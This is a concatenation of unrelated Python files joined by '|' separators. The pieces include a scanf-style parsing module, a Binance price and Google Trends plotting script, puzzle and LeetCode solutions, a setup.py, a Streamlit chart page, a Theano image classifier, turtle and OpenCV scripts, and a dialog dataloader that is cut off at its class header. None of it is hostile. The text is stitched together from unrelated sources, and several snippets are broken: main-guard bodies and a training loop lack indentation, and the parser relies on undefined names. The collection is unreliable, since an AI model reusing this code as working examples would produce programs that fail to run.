class CharacterBufferFromFile(CharacterBuffer):
    """CharacterBuffer over a file-like object, using native read(1)
    plus absolute seek() to implement push-back. Absolute (not relative)
    seek keeps StringIO and text-mode files compatible."""

    def __init__(self, myfile):
        self.myfile = myfile
        self.lastPos = None  # tell() position recorded before last getch()

    def getch(self):
        self.lastPos = self.myfile.tell()
        return self.myfile.read(1)

    def ungetch(self, ch):
        pos = self.lastPos
        if pos is None:
            raise RuntimeError("can not ungetch twice in a row, or before"
                               " getch is called once")
        self.lastPos = None
        # Rewind to just before the character that was read.
        self.myfile.seek(pos, 0)
def readiter(inputFile, *args):
    """Yield successive results of inputFile.read(*args), stopping as
    soon as read() returns a falsy value (end of input)."""
    chunk = inputFile.read(*args)
    while chunk:
        yield chunk
        chunk = inputFile.read(*args)
def isIterable(thing):
    """Return True if iter(thing) succeeds, i.e. 'thing' is iterable."""
    try:
        iter(thing)
        return True
    except TypeError:
        return False
def isFileLike(thing):
    """Return True if 'thing' supports the read/seek/tell protocol.

    We probe by reading one character and seeking back with an absolute
    seek — relative seek is avoided because StringIO and text-mode file
    objects no longer support it (they read unicode, not bytes).
    """
    if not (hasattr(thing, "read") and hasattr(thing, "seek")
            and hasattr(thing, "tell")):
        return False
    try:
        start = thing.tell()
        thing.read(1)
        thing.seek(start, 0)
        if thing.tell() != start:
            # The object claimed to seek but didn't return to 'start';
            # hard-error because our probe has now corrupted the buffer.
            raise RuntimeError("object seemed to implement seek, but"
                               " could not reset back to start position")
        return True
    except IOError:
        return False
def makeCharBuffer(thing):
    """Coerce 'thing' into a CharacterBuffer.

    Accepted, in order of preference:
        1. a CharacterBuffer (returned unchanged),
        2. a file-like object,
        3. any iterable.
    Raises ValueError for anything else.
    """
    if isinstance(thing, CharacterBuffer):
        return thing
    # The file check must come before the iterable check: files provide
    # a line-based iterator we don't want, and file.seek() is cheaper.
    if isFileLike(thing):
        return CharacterBufferFromFile(thing)
    if isIterable(thing):
        return CharacterBufferFromIterable(thing)
    raise ValueError("Can't coerse %r to CharacterBuffer" % thing)
class CappedBuffer(CharacterBuffer):
    """Wraps another CharacterBuffer, capping how many characters can
    be read through it. With ignoreWhitespace set, whitespace does not
    count against the cap."""

    def __init__(self, buffer, width, ignoreWhitespace=False):
        self.buffer = buffer
        self.bytesRead = 0           # characters counted so far
        self.width = width           # the cap
        self.ignoreWhitespace = ignoreWhitespace

    def getch(self):
        if self.bytesRead >= self.width:
            return ''
        ch = self.buffer.getch()
        if not self.isIgnoredChar(ch):
            self.bytesRead += len(ch)
        return ch

    def isIgnoredChar(self, ch):
        # Whitespace is exempt from the cap only when requested.
        return self.ignoreWhitespace and isWhitespaceChar(ch)

    def ungetch(self, ch):
        self.buffer.ungetch(ch)
        if not self.isIgnoredChar(ch):
            self.bytesRead -= len(ch)
        # make sure wacky things don't happen when ungetch()ing.
        assert self.bytesRead >= 0
class FormatError(ValueError):
    """Raised when the input does not match the format being scanned."""
class IncompleteCaptureError(ValueError):
    """Raised by the *scanf() functions when scanning fails partway;
    its args carry the underlying error and the values captured so far."""
# We keep a module-level STDIN CharacterBuffer, so that we can call
# scanf() several times and not lose characters between invocations.
try:
    _STDIN = CharacterBufferFromIterable(sys.stdin)

    def scanf(formatString):
        """scanf(formatString) -> tuple

        Scans standard input for formats specified in the formatString. See
        module's docs for list of supported format characters."""
        return bscanf(_STDIN, formatString)
except TypeError:
    # Fixed: the original read "except:" with a bare, no-op "TypeError"
    # expression as its body — a bare except that silently swallowed
    # *every* error. Catch only TypeError (sys.stdin not iterable, e.g.
    # when it has been replaced); in that case scanf() is unavailable.
    pass
def sscanf(inputString, formatString):
    """sscanf(inputString, formatString) -> tuple

    Scans 'inputString' for formats specified in the formatString. See
    module's docs for list of supported format characters."""
    buffer = CharacterBufferFromIterable(inputString)
    return bscanf(buffer, formatString)
def fscanf(inputFile, formatString):
    """fscanf(inputFile, formatString) -> tuple

    Scans 'inputFile' for formats specified in the formatString. See
    module's docs for list of supported format characters."""
    return bscanf(CharacterBufferFromFile(inputFile), formatString)
def bscanf(buffer, formatString):
    """bscanf(buffer, formatString) -> tuple

    Scans a CharacterBuffer 'buffer' for formats specified in the
    formatString. See scanf module's docs for list of supported format
    characters."""
    # TODO: we may want to do some caching here of compiled formatStrings,
    # similar to that of the 're' module.
    # NOTE: 'compile' is this module's format compiler (defined below),
    # which shadows the builtin of the same name.
    parser = compile(formatString)
    return parser(buffer)
def isWhitespaceChar(ch, _set=set(WHITESPACE)):
    """Returns true if the character looks like whitespace.
    We follow the definition of C's isspace() function.

    '_set' is a precomputed default built once at definition time so the
    membership test stays O(1); callers should not pass it explicitly.
    """
    return ch in _set
def handleWhitespace(buffer):
    """Consume a run of whitespace from 'buffer' and return it; the
    first non-whitespace character is pushed back."""
    collected = []
    ch = buffer.getch()
    while isWhitespaceChar(ch):
        collected.append(ch)
        ch = buffer.getch()
    buffer.ungetch(ch)
    return ''.join(collected)
# We keep a few sets as module variables just to incur the cost of
# constructing them just once.
_PLUS_MINUS_SET = set("+-")                # sign characters
_DIGIT_SET = set(DIGITS)                   # decimal digits
_OCT_SET = set("01234567")                 # octal digits
_HEX_SET = set("0123456789ABCDEFabcdef")   # hexadecimal digits
def handleDecimalInt(buffer, optional=False, allowLeadingWhitespace=True):
    """Scan a (possibly signed) decimal integer from 'buffer'.

    Returns None instead of raising FormatError when 'optional' is true
    and no integer can be read."""
    if allowLeadingWhitespace:
        handleWhitespace(buffer)  # eat leading spaces
    text = (buffer.scanCharacterSet(_PLUS_MINUS_SET, 1)
            + buffer.scanCharacterSet(_DIGIT_SET))
    try:
        return int(text, 10)
    except ValueError:
        if optional:
            return None
        raise FormatError("invalid literal characters: %s" % text)
def handleOct(buffer):
    """Scan a (possibly signed) octal integer from 'buffer'."""
    text = (buffer.scanCharacterSet(_PLUS_MINUS_SET)
            + buffer.scanCharacterSet(_OCT_SET))
    try:
        return int(text, 8)
    except ValueError:
        raise FormatError("invalid literal characters: %s" % text)
def handleInt(buffer, base=0):
    """Scan a C '%i'-style integer: optional sign, optional '0'/'0x'
    prefix, then digits. 'base' is handed straight to int(), so base 0
    auto-detects octal/hex from the prefix."""
    pieces = [buffer.scanCharacterSet(_PLUS_MINUS_SET),
              buffer.scanCharacterSet("0")]
    # Only look for an 'x'/'X' radix marker right after a leading zero.
    if pieces[-1].endswith('0'):
        pieces.append(buffer.scanCharacterSet("xX"))
    pieces.append(buffer.scanCharacterSet(_HEX_SET))
    text = ''.join(pieces)
    try:
        return int(text, base)
    except ValueError:
        raise FormatError("invalid literal characters: %s" % text)
def handleHex(buffer):
    """Scan a hexadecimal integer (handleInt with base fixed to 16)."""
    return handleInt(buffer, 16)
def handleFloat(buffer, allowLeadingWhitespace=True):
    """Scan a floating point number: sign, integer digits, optional
    fractional part, optional signed exponent (e.g. '-12.5e+3')."""
    if allowLeadingWhitespace:
        handleWhitespace(buffer)  # eat leading whitespace
    # Greedily scan each syntactic piece in order; missing pieces
    # simply contribute the empty string.
    pieces = [buffer.scanCharacterSet(charSet) for charSet in
              (_PLUS_MINUS_SET, _DIGIT_SET, ".", _DIGIT_SET,
               "eE", _PLUS_MINUS_SET, _DIGIT_SET)]
    text = ''.join(pieces)
    try:
        return float(text)
    except ValueError:
        raise FormatError("invalid literal characters: %s" % text)
def handleChars(buffer,
                allowLeadingWhitespace=False,
                isBadCharacter=lambda ch: False,
                optional=False):
    """Read every available character from 'buffer', stopping at the
    first character for which isBadCharacter(ch) is true.

    Raises FormatError on an empty capture unless 'optional' is set,
    in which case None is returned instead."""
    if allowLeadingWhitespace:
        handleWhitespace(buffer)
    captured = buffer.scanPredicate(lambda ch: not isBadCharacter(ch))
    if captured:
        return captured
    if optional:
        return None
    raise FormatError("Empty buffer.")
def handleString(buffer, allowLeadingWhitespace=True):
    """Reading a string format is just an application of reading
    characters (skipping leading spaces, and reading up to — but not
    including — the next whitespace character)."""
    return handleChars(buffer,
                       allowLeadingWhitespace=allowLeadingWhitespace,
                       isBadCharacter=isWhitespaceChar)
def makeHandleLiteral(literal):
    """Return a handler that consumes exactly 'literal' from a buffer.

    On success the handler returns the literal; on mismatch it pushes
    the character back, then raises FormatError — or returns None when
    invoked with optional=True."""
    def matchLiteral(buffer, optional=False):
        ch = buffer.getch()
        if ch == literal:
            return ch
        buffer.ungetch(ch)
        if optional:
            return None
        raise FormatError("%s != %s" % (literal, ch))
    return matchLiteral
def makeWidthLimitedHandler(handler, width, ignoreWhitespace=False):
    """Wrap 'handler' so it reads through a CappedBuffer, limiting how
    many characters it may consume from the underlying buffer."""
    def cappedHandler(buffer):
        return handler(CappedBuffer(buffer, width, ignoreWhitespace))
    return cappedHandler
"""Just for kicks: handleChar is a handler for a single character."""
handleChar = makeWidthLimitedHandler(handleChars, 1, ignoreWhitespace=False)
def makeIgnoredHandler(handler):
    """Wrap 'handler' so its result is discarded: the wrapper still
    consumes input but always returns None, the sentinel used for
    suppressed (non-captured) values."""
    def ignoredHandler(buffer):
        handler(buffer)
        return None
    return ignoredHandler
class CompiledPattern(object):
    """A compiled scanf format: an ordered sequence of handler
    callables applied to a CharacterBuffer."""

    def __init__(self, handlers, formatString):
        self.handlers = handlers
        self.formatString = formatString  # kept only for repr()

    def __call__(self, buffer):
        """Run every handler against 'buffer' and return the captured
        values as a tuple. Handlers that return None (the 'ignored'
        sentinel) contribute nothing. On FormatError, raises
        IncompleteCaptureError carrying the error plus whatever was
        captured before the failure."""
        captured = []
        try:
            for handler in self.handlers:
                value = handler(buffer)
                if value is not None:
                    captured.append(value)
        except FormatError as e:
            raise IncompleteCaptureError(e, tuple(captured))
        return tuple(captured)

    def __repr__(self):
        return "compile(%r)" % self.formatString
def compile(formatString):
    """Compile 'formatString' into a CompiledPattern that eats a
    CharacterBuffer and returns the captured values as a tuple.

    If scanning fails partway, calling the pattern raises
    IncompleteCaptureError whose args are the underlying FormatError
    and the values captured before the error occurred.

    Note: deliberately shadows the 'compile' builtin, mirroring
    re.compile's naming.
    """
    handlers = []
    formatBuffer = CharacterBufferFromIterable(formatString)
    ch = formatBuffer.getch()
    while ch != '':
        if isWhitespaceChar(ch):
            # Whitespace in the format matches any run of whitespace.
            handleWhitespace(formatBuffer)
            handlers.append(makeIgnoredHandler(handleWhitespace))
        elif ch == '%':
            handlers.append(_compileFormat(formatBuffer))
        else:
            # Any other character must match literally; not captured.
            handlers.append(makeIgnoredHandler(makeHandleLiteral(ch)))
        ch = formatBuffer.getch()
    return CompiledPattern(handlers, formatString)
def _compileFormat(formatBuffer):
    """Compile one '%...' directive (the '%' is already consumed) into
    a handler. Raises FormatError for an unknown format character."""
    # A directive is: optional '*' (assignment suppression), an
    # optional decimal width, then the format character itself.
    suppressed = makeHandleLiteral("*")(formatBuffer, optional=True) == "*"
    width = handleDecimalInt(formatBuffer,
                             optional=True,
                             allowLeadingWhitespace=False)
    formatCh = formatBuffer.getch()
    handler = makeFormattedHandler(suppressed, width, formatCh)
    if handler is None:
        # At this point, since we couldn't figure out the format, die loudly.
        raise FormatError("Invalid format character %s" % formatCh)
    return handler
# Maps each format character to its scanning handler. 'c' is absent on
# purpose: it is handled separately in makeFormattedHandler because it
# must not skip whitespace.
_FORMAT_HANDLERS = {'d': handleDecimalInt,
                    'i': handleInt,
                    'x': handleHex,
                    'o': handleOct,
                    's': handleString,
                    'f': handleFloat,
                    '%': makeIgnoredHandler(makeHandleLiteral('%'))
                    }
def makeFormattedHandler(suppression, width, formatCh):
    """Build the handler for one format directive.

    Arguments:
        suppression -- True for '%*...': scan the field but capture nothing.
        width -- maximum field width, or None for unlimited.
        formatCh -- format character: one of 'd', 'i', 'x', 'o', 's',
            'f', 'c', '%'.

    Returns the handler callable, or None if formatCh is unrecognized.
    """
    def applySuppression(handler):
        if suppression:
            return makeIgnoredHandler(handler)
        return handler

    def applyWidth(handler):
        # Fixed: use identity comparison with None ('is not' / 'is')
        # instead of '!=' / '==', the correct Python idiom.
        if width is not None:
            return makeWidthLimitedHandler(handler, width,
                                           ignoreWhitespace=True)
        return handler

    # 'c' is a special case: it's the only handler that can't ignore
    # whitespace.
    if formatCh == 'c':
        if width is None:
            return applySuppression(handleChar)
        return applySuppression(
            makeWidthLimitedHandler(handleChars, width,
                                    ignoreWhitespace=False))
    if formatCh in _FORMAT_HANDLERS:
        return applySuppression(applyWidth(_FORMAT_HANDLERS[formatCh]))
    return None
|
from binance.client import Client
import pandas as pd
import os
import matplotlib.pyplot as plt
import numpy as np
from sklearn import preprocessing
import talib
from pytrends.request import TrendReq
class Features():
    """Builds candidate trading features (price changes, Google Trends
    alignment) from Binance market data.

    NOTE(review): constructing this class performs file and network I/O
    (reads API keys from disk, queries Binance, reads CSVs).
    """

    # Binance API credentials; populated from disk by __init__.
    API, API_SECRET = '', ''
    # Feature configuration: price-change lookback horizons, in hours.
    FEATURE_LIST = {
        "price_change" : ['1','2','4','6','12','24','48','96']
    }

    def __init__(self):
        # Load "key,secret" from the metadata file and build the client.
        with open('../metadata/binance_keys.txt') as f:
            keys = f.read()
        keys = keys.split(',')
        Features.API, Features.API_SECRET = keys[0], keys[1]
        self.client = Client(Features.API, Features.API_SECRET)
        # filename = '../dataset_files/price_moves/hour/ADABNB.csv'
        # self.data = pd.read_csv(filename, index_col=0)
        # self.close = self.data.Close
        # features_df = pd.DataFrame()
        # self.get_price_change()
        self.read_google_trends()

    def get_price_change(self):
        """Compute the fractional close-price change over each horizon
        configured in FEATURE_LIST['price_change'].

        NOTE(review): relies on self.close, which is only assigned by
        code currently commented out in __init__ — calling this as-is
        would raise AttributeError; confirm before re-enabling.
        """
        df = pd.DataFrame()
        df['close'] = self.close
        for change in Features.FEATURE_LIST['price_change']:
            change = int(change)
            # Label horizons of a day or more in days, otherwise hours.
            if int(change) / 24 >= 1:
                name = change / 24
                name = str(int(name))+'D'
            else:
                name = str(change)+'H'
            # Relative change vs. the close 'change' rows earlier.
            df[f'{name}_change'] = (self.close-self.close.shift(change)) / self.close.shift(change)
        print(df)

    def big_price_move(self):
        # Placeholder — not implemented yet.
        pass

    def read_google_trends(self):
        """Plot DOCK close prices against Google Trends interest.

        Reads 'dock_trends.csv', normalizes its timestamp index, aligns
        it with 1-minute Binance klines resampled to 8-minute buckets,
        then draws both series on twin y-axes.
        """
        google_df = pd.read_csv('dock_trends.csv', index_col=0)
        google_df['trends'] = google_df['dock coin: (Worldwide)']
        # Index looks like ISO strings with a 'T' separator and a
        # trailing UTC offset; strip both before parsing.
        google_df.index = google_df.index.str.replace('T', ' ')
        google_df.index = google_df.index.str[:-6]
        google_df = google_df[:-1]
        google_df.index = pd.to_datetime(google_df.index, infer_datetime_format=True)
        # 16-period exponential moving average of the trends series.
        ema_trends = talib.EMA(google_df.trends, timeperiod=16)
        price_df = self.get_price_temp()
        # + pd.DateOffset(minutes=4)
        trun_time = google_df.index[0]
        print(google_df.index[0])
        price_df.index = pd.to_datetime(price_df.index, infer_datetime_format=True, unit='s')
        # Keep only prices from the start of the trends window onward.
        price_df = price_df.truncate(before = trun_time)
        price_df= price_df.resample('8T').sum()
        print(price_df.index)
        print(ema_trends.index)
        # y2 = min_max_scaler.fit_transform(df_google.values)
        # plt.plot(price_df.index, price_df.close, ema_trends, 'r--')
        # plt.xticks(rotation='vertical')
        # plt.show()
        fig, ax1 = plt.subplots()
        t = price_df.index
        s1 = price_df.close
        ax1.plot(t, s1, 'b-')
        ax1.set_xlabel('Date hour (h)')
        # Make the y-axis label, ticks and tick labels match the line color.
        ax1.set_ylabel('Close prices', color='b')
        ax1.tick_params('y', colors='b')
        # Second y-axis sharing the same x-axis for the trends series.
        ax2 = ax1.twinx()
        s2 = google_df.trends
        ax2.plot(t, s2, 'r-')
        ax2.set_ylabel('Google Trends 7 EMA', color='r')
        ax2.tick_params('y', colors='r')
        fig.tight_layout()
        plt.show()

    def get_price_temp(self):
        """Return 1-minute DOCKBTC klines for the last day as a
        DataFrame indexed by unix seconds, caching to '<pair>.csv'."""
        pair = 'DOCKBTC'
        if os.path.exists(f'{pair}.csv'):
            df = pd.read_csv(f'{pair}.csv', index_col=0)
            return df
        else:
            df = pd.DataFrame()
            print(f'Getting price data for {pair}')
            column_list = ['date','open','high','low','close','volume']
            price_data = self.client.get_historical_klines(pair, Client.KLINE_INTERVAL_1MINUTE, "1 day ago UTC")
            for index, col in enumerate(column_list):
                if col == 'date':
                    # Kline timestamps arrive in ms; convert to seconds,
                    # then add 3600 — presumably a timezone shift; confirm.
                    df['date'] = [int(entry[0]/1000)+3600 for entry in price_data]
                    continue
                df[col] = [entry[index] for entry in price_data]
                df[col] = df[col].astype('float64')
            df.set_index('date', inplace=True)
            print('Finished. Saving to csv')
            df.to_csv(f'{pair}.csv')
            return df
x = Features() |
# For each test case: read the number of suspects (0 terminates), then
# their values; report the 1-based position of the SECOND-largest value
# (the largest is zeroed out, then the new maximum is located).
while True:
    quantidade = int(input())
    if quantidade == 0:
        break
    suspeitos = list(map(int, input().split()))
    suspeitos[suspeitos.index(max(suspeitos))] = 0
    print(suspeitos.index(max(suspeitos)) + 1)
|
import extractText

# Facebook CDN link to a PDF (CV); the signed query parameters ('oh',
# 'oe', ...) are time-limited, so this URL will eventually expire.
url = "https://cdn.fbsbx.com/v/t59.2708-21/87471654_129388618504729_4629126029485539328_n.pdf/CV-Flipkart.pdf?_nc_cat=110&_nc_sid=0cab14&_nc_oc=AQmqQ1glOGXLTCOlUaMTUHrjtDyFhRlEr_TNHzZlIny6O51sy_pbl-gqEohpXZGLw37PJWaDfb9Td03XJKmPKcNK&_nc_ht=cdn.fbsbx.com&oh=f673186b4a1ad7e03d357c4e2aacde8a&oe=5E6068CC"
# Download the PDF to local file "file" via the project helper.
extractText.downloadFile(url,"file")
|
from codecs import open
from os import path
from setuptools import Extension, find_packages, setup
# Resolve paths relative to this setup.py so builds work from any CWD.
here = path.abspath(path.dirname(__file__))

# Reuse the README as the long description shown on PyPI.
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
    long_description = f.read()

setup(
    name='search_in_files',
    version='0.0.6',
    description='A tool for find text in files.',
    long_description=long_description,
    url='https://github.com/danielgatis/search_in_files',
    author='Daniel Gatis',
    author_email='danielgatis@gmail.com',
    license='MIT',
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Build Tools',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
    ],
    keywords='python file-search text-search fast',
    # Cython is needed at build time to compile the .pyx extension below.
    setup_requires=['cython'],
    install_requires=['six'],
    packages = find_packages(exclude=['notebooks']),
    ext_modules=[
        Extension(
            'search_in_files.csearch',
            sources=['search_in_files/csearch.pyx'],
        ),
    ],
    entry_points={
        'console_scripts': [
            'search_in_files = search_in_files.search:main'
        ]
    },
)
|
import streamlit as st
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
def info():
    """Render one average-per-country chart for each happiness factor.

    Loads the combined happiness dataset, averages each factor per
    country (ranked by Happiness Score), and pushes one matplotlib
    figure per factor to the Streamlit page.
    """
    df = pd.read_csv('data/happiness_combined_year copy 2.csv')
    df = df.drop(columns=['Unnamed: 0'], axis=1)
    # Per-country means, ordered by happiness so the x-axis is ranked.
    avg = df.groupby(['Country']).mean().sort_values(
        by='Happiness Score', ascending=False).reset_index()
    # (column, chart title) pairs — replaces six copy-pasted stanzas.
    charts = [
        ('Generosity', "Average Generosity Country-wise"),
        ('Trust (Government Corruption)', "Average Government Corruption Country-wise"),
        ('Freedom', "Average Freedom Country-wise"),
        ('Economy (GDP per Capita)', "Average GDP Country-wise"),
        ('Health (Life Expectancy)', "Average Life Expectancy Country-wise"),
        ('Family', "Average Social Support Country-wise"),
    ]
    for column, title in charts:
        avg.plot('Country', column)
        plt.title(title)
        st.pyplot()
def load_page():
    """Page entry point: centered heading followed by the charts."""
    heading = "<h1 style='text-align: center;'>Average Based Analysis</h1>"
    st.markdown(heading, unsafe_allow_html=True)
    info()
if __name__ == "__main__":
load_page()
|
def topla(*sayilar):
    """Return the sum of all positional arguments (0 when none given)."""
    # The builtin sum() replaces the manual accumulator loop.
    return sum(sayilar)
print("Sayıların Toplamı :", topla(1, 3, 5, 7, 10, 15, 20, 65, 15))
|
import pandas as pd
import matplotlib.pyplot as plt
import statsmodels.graphics.tsaplots as tsplots
import statsmodels.tsa.arima.model as arma
import numpy as np
import helper_functions_4
import statsmodels.formula.api as smf
import statsmodels.tsa.stattools as stats
def main():
    """Load the observations CSV and prepare a datetime column.

    The per-exercise analysis calls (opdracht2/4/5) are currently
    commented out, so this only reads and parses the data.
    """
    # data is a dataframe, first column is year, second column is GDP
    data = pd.read_csv('./data.csv', delimiter=',',
                       names=['obs', 'cons', 'inc', 'time'], skiprows=1)
    data['datetime'] = pd.to_datetime(data['obs'])
    print()
    # opdracht2(data)
    # opdracht4(data)
    # opdracht5(data)

# plot acf and pacf
def opdracht2(data):
    """Exercise 2: ACF/PACF plots — currently a stub; all plotting
    code below is commented out."""
    pass
    # acf and pacf apple
    # tsplots.plot_acf(data['apple'].values, lags=12, zero=False, title="Autocorrelation Apple")
    # tsplots.plot_pacf(data['apple'].values, lags=12, zero=False, title="Partial Autocorrelation Apple")
    # plt.show()
    #
    # acf and pacf netflix
    # tsplots.plot_acf(data['netflix'].values, lags=12, zero=False, title="Autocorrelation Netflix")
    # tsplots.plot_pacf(data['netflix'].values, lags=12, zero=False, title="Partial Autocorrelation Netflix")
    # plt.show()
if __name__ == '__main__':
main()
|
import numpy
import theano
import theano.tensor as T
import TP1
rng = numpy.random
def escala_gris(img):
    """Collapse an RGB image to grayscale by averaging the 3 channels
    (fixed weights of 0.3333 each, as in the original)."""
    pesos = [0.3333, 0.3333, 0.3333]
    return numpy.dot(img, pesos)
def procesar_imagen(img):
    """Preprocess one image: normalize, resize to 28x28, convert to
    grayscale, and return it as a flat feature vector."""
    normalizada = TP1.normalize(img)
    reducida = TP1.resize_image(normalizada, 28)
    return escala_gris(reducida).flatten()
aviones = TP1.get_images_clase("airplanes")
aviones_cl = [0] * len(aviones)
motos = TP1.get_images_clase("Motorbikes")
motos_cl = [1] * len(motos)
numpy.random.shuffle(aviones)
numpy.random.shuffle(motos)
NTest = 200; # Por clase
test = aviones[-NTest:] + motos[-NTest:]
test_cl = aviones_cl[-NTest:] + motos_cl[-NTest:]
aviones = aviones[:-NTest]
motos = motos[:-NTest]
aviones_cl = aviones_cl[:-NTest]
motos_cl = motos_cl[:-NTest]
merged = list(map(procesar_imagen,aviones+motos))
test = list(map(procesar_imagen,test))
D = (merged, aviones_cl + motos_cl)
Tst = (test, test_cl)
N = len(D)
training_steps = 10000
feats = 784 # number of input variables
# Declare Theano symbolic variables
x = T.dmatrix("x")
y = T.dvector("y")
# initialize the weight vector w randomly
#
# this and the following bias variable b
# are shared so they keep their values
# between training iterations (updates)
w = theano.shared(rng.randn(feats), name="w")
# initialize the bias term
b = theano.shared(0., name="b")
print("Initial model:")
print(w.get_value())
print(b.get_value())
# Construct Theano expression graph
p_1 = 1 / (1 + T.exp(-T.dot(x, w) - b)) # Probability that target = 1
prediction = p_1 > 0.5 # The prediction thresholded
xent = -y * T.log(p_1) - (1-y) * T.log(1-p_1) # Cross-entropy loss function
cost = xent.mean() + 0.01 * (w ** 2).sum()# The cost to minimize
gw, gb = T.grad(cost, [w, b]) # Compute the gradient of the cost
# w.r.t weight vector w and
# bias term b
# (we shall return to this in a
# following section of this tutorial)
# Compile
train = theano.function(
inputs=[x,y],
outputs=[prediction, xent],
updates=((w, w - 0.1 * gw), (b, b - 0.1 * gb)))
predict = theano.function(inputs=[x], outputs=prediction)
# Train
for i in range(training_steps):
pred, err = train(D[0], D[1])
print("Final model:")
print(w.get_value())
print(b.get_value())
print("target values for D:")
print(D[1])
print("prediction on D:")
print(predict(D[0]))
print("predcition on T:")
pred = predict(Tst[0])
print(pred)
print("Correcto (%): ")
print(sum(pred == Tst[1])*100/len(Tst[1]))
|
import turtle

turtle.setpos(-400, 0)
pen = turtle.Pen()
# L-system-style mosaic: the user supplies a start string, a rewrite
# rule ("pattern replacement") and an iteration count; the derived
# string is then interpreted as turtle movements.
print(" Para criarmos o mosaico desejado, precisamos de O-O-O-O como \
codigo de entrada, e O yo-pO+xO+bOoO-rO-gO+bO como regra. Além de 4 Repetições ")
inicio = str(input("Digite o código de entrada: "))
regra = str(input("Digite a regra desejada: "))
rep = int(input("Digite o número de repetições desejado: "))
final = "" # the final code is a string we will convert into movements
regra = regra.split(" ") # split so we can treat the rule as [pattern, replacement]
i = 0
while i < rep: # derive the final code from the rule and the start code
    final = inicio.replace(regra[0], regra[1])
    inicio = final
    i+=1
turtle.pencolor("red")
# conversion: each character maps to a pen movement or a turn
for i in final.upper():
    if i == "O":
        turtle.pendown()
        turtle.forward(10)
    elif i == "-":
        turtle.right(90)
    elif i == "+":
        turtle.left(90)
    elif i == "*":
        turtle.right(60)
    elif i == "/":
        turtle.left(60)
turtle.speed('fastest')
# Example inputs:
# O-O-O-O
# O yo-pO+xO+bOoO-rO-gO+bO
#
|
def checkio(n):
    """Return feed(n, 1, 0): the count for n portions starting with a
    single pigeon and nothing previously fed (per the asserts below,
    e.g. checkio(5) == 3, checkio(10) == 6)."""
    return feed(n, 1, 0)
def feed(n, pigeon, last):
    """Iterative version of the original tail recursion.

    Each round: if the remaining portions 'n' don't exceed 'last'
    (previous round's count) return 'last'; if they don't exceed
    'pigeon' (this round's count) return 'n'; otherwise consume
    'pigeon' portions and grow to the next round's count.
    """
    while True:
        if n <= last:
            return last
        if n <= pigeon:
            return n
        n -= pigeon
        pigeon, last = 2 * pigeon - last + 1, pigeon
if __name__ == '__main__':
assert checkio(0) == 0, 0
assert checkio(1) == 1, 1
assert checkio(2) == 1, 2
assert checkio(5) == 3, 5
assert checkio(10) == 6, 10
print('All OK')
|
class Solution(object):
    """LeetCode 47 (Permutations II): all unique permutations of a list
    that may contain duplicate values."""

    def permuteUnique(self, nums):
        """
        :type nums: List[int]
        :rtype: List[List[int]]

        Returns every distinct permutation of nums in lexicographic
        order, using the iterative next-permutation algorithm.
        """
        return self.nonRecursive(nums)

    def recursive(self, nums, i, res):
        """Swap-based recursive enumeration, kept for reference only —
        permuteUnique does not use it.

        NOTE(review): the 'nums[v] == nums[i]' skip does not fully
        deduplicate for some inputs; verify before switching
        permuteUnique to this path.
        """
        if i >= len(nums):
            res.append(nums[:])
            return
        self.recursive(nums, i + 1, res)
        for v in range(i + 1, len(nums)):
            if nums[v] == nums[i]:
                continue
            nums[v], nums[i] = nums[i], nums[v]
            self.recursive(nums, i + 1, res)
            nums[i], nums[v] = nums[v], nums[i]

    def nonRecursive(self, nums):
        """Enumerate unique permutations by repeatedly applying the
        classic next-permutation step, starting from sorted order.
        (Leftover debug print() calls were removed.)"""
        res = []
        nums.sort()
        while True:
            res.append(nums[:])
            # Find the rightmost ascent nums[p-1] < nums[p]; using '<='
            # in the scan makes runs of duplicates count as descents,
            # which is what collapses duplicate permutations.
            p = len(nums) - 1
            while p > 0 and nums[p] <= nums[p - 1]:
                p -= 1
            if p == 0:
                break  # fully descending: that was the last permutation
            # Swap the pivot with the rightmost element greater than it.
            swap = p - 1
            q = len(nums) - 1
            while q > swap and nums[q] <= nums[swap]:
                q -= 1
            nums[q], nums[swap] = nums[swap], nums[q]
            # Reverse the suffix to restore ascending order after the pivot.
            q = len(nums) - 1
            while p < q:
                nums[p], nums[q] = nums[q], nums[p]
                p += 1
                q -= 1
        return res
test = [1,1,2]
a=Solution()
print(a.permuteUnique(test)) |
from itertools import permutations
def lexicographical_combos(word, rank):
    """Return the permutation of 'word' at 1-based position 'rank' in
    the sorted list of all its permutations. Repeated letters yield
    repeated entries, matching itertools.permutations semantics."""
    ordered = sorted(map(''.join, permutations(word)))
    return ordered[rank - 1]
# Driver: first line is the number of test cases; each case is a word
# followed by the 1-based rank to print.
n = int(input())
while n:
    word, rank = input().split()
    print(lexicographical_combos(word, int(rank)))
    n -= 1
|
import cv2
import numpy as np
from matplotlib import pyplot as plt
# Color-range endpoints as 1x1x3 pixels, so cvtColor can convert them.
# NOTE(review): cv2.COLOR_BGR2HSV treats these triples as B,G,R despite
# the 'rgb_' names — confirm the intended channel order.
rgb_min_blue = np.uint8([[[50, 50, 200]]])
rgb_max_blue = np.uint8([[[100,0,255 ]]])
# hsv_min = np.array([110,50,50])
# hsv_max = np.array([130,255,255])
hsv_max = cv2.cvtColor(rgb_max_blue,cv2.COLOR_BGR2HSV)
hsv_min = cv2.cvtColor(rgb_min_blue,cv2.COLOR_BGR2HSV)
# hsv_max = np.array([130,30,30])
# hsv_min = np.array([130,255,255])
cap = cv2.VideoCapture(1)  # camera index 1 (secondary/external camera)
ret, img = cap.read()
# img = cv2.imread('122_H_0deg.jpg')
# Threshold the frame in HSV space and keep only the in-range pixels.
hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv_img, hsv_min, hsv_max)
res = cv2.bitwise_and(img,img, mask= mask)
# plt.imshow(mask)
# plt.imshow(res)
plt.imshow(res)
plt.show()
# TODO: I think we might have to upgrade opencv for this to work
# cv2.imshow('mask', mask)
# cv2.imshow('res', res)
# k = cv2.waitKey(5) & 0xFF
# if k == 27:
#     break
# plt.imshow(img)
# plt.xticks([]), plt.yticks([]) # to hide tick values on X and Y axis
# plt.plot([200,300,400],[100,200,300],'c', linewidth=5)
# plt.show()
|
import random
import csv
import numpy as np
from collections import Counter
from itertools import chain
from .dataloader import Dataloader
from ..metric import MetricChain, PerlplexityMetric, BleuCorpusMetric, SingleDialogRecorder
from .._utils import trim_before_target
class MultiTurnDialog(Dataloader):
